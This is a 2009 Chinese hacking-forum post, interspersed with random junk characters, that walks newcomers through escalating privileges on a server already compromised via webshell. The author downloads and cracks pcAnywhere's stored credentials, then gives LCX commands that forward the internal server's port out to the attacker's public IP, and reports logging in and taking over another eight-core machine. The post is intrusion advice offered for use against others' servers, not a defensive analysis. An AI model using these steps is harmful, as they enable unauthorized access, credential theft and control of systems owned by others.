|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。' A0 |5 a; S, Z: F3 |( g
0 \: k$ |3 T# d提权方法:pcanywhere+LCX
$ c% D( e: |. d: J7 }/ z% ?, L: D1 l) Z1 ^0 d; @8 w" _( \
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
( d( x) M3 F# F- A2 @7 E
0 P3 Y" u$ { @. x在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。. T) D. y8 u+ ~: L$ T
2 m* K+ v# E5 K7 \5 B9 Z+ y: O) w; Y/ q* K+ F
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。5 a" M5 r' [& I: V
: |" r' |/ d- l. W# l& j& ?2 B
) D' K+ a6 ]) z9 ^3 E( c y* }: x9 u
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
7 u! o/ S" p9 X3 W. w9 K0 E: w# ]# m& M e; V* ?
2 H/ ?5 r8 B! h& `& s+ `, H
" n" z1 s3 r# Q& A
4 i8 i9 b9 K& Z
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
, d- M0 ]8 G' ^ I+ a/ g3 G( V% w8 j: s: @8 s
" @% @$ T$ _) E
LCX的用法再简单说下:# Q O* E( N0 ?/ p$ \' p
$ |3 q o/ o/ c# y+ T. c7 O! X
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
% `. W: N/ W- }. G( l% P9 ~! ~6 b! ^; G v
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)/ U) V/ q6 L! o0 ]2 s* p, }# Y
7 n1 D u3 ]) K8 s) j8 [0 \! u
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
* c& Y# C0 T& C, W. v- \. P- q顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``" n4 I4 ?7 h( A$ N7 Z( s4 i
3 s' w4 J) F" M0 z0 {
6 X! l# f4 F9 r* j, Z: ]! L
4 v+ C6 U6 r$ g
; b' J0 `7 W7 P8 ^7 M5 q呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
! W+ K! c% _! s4 r8 d3 S% s3 C$ Z# @6 u$ }3 {3 o" F' S
. V# @9 z) a% i8 g# e
7 w9 ?' h! l! Q( x
. J6 w9 S' D2 e! W4 W! P我们本地连接试试,输入我们刚破解的账号密码
3 r; M9 S3 }/ X! `$ \7 j% g4 ~0 a" `7 o# i( U7 d+ |3 }
- n' k: Z1 _+ k
呵呵``连接成功,服务器不错,又一个8核^︵^
" G; h( [4 K' e' b$ r6 w8 S8 D1 z: L3 b2 V
; F5 o$ Y" a: _2 E9 W! ]& d
7 u4 v3 E) F" L+ Y2 P( ~! f% z |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
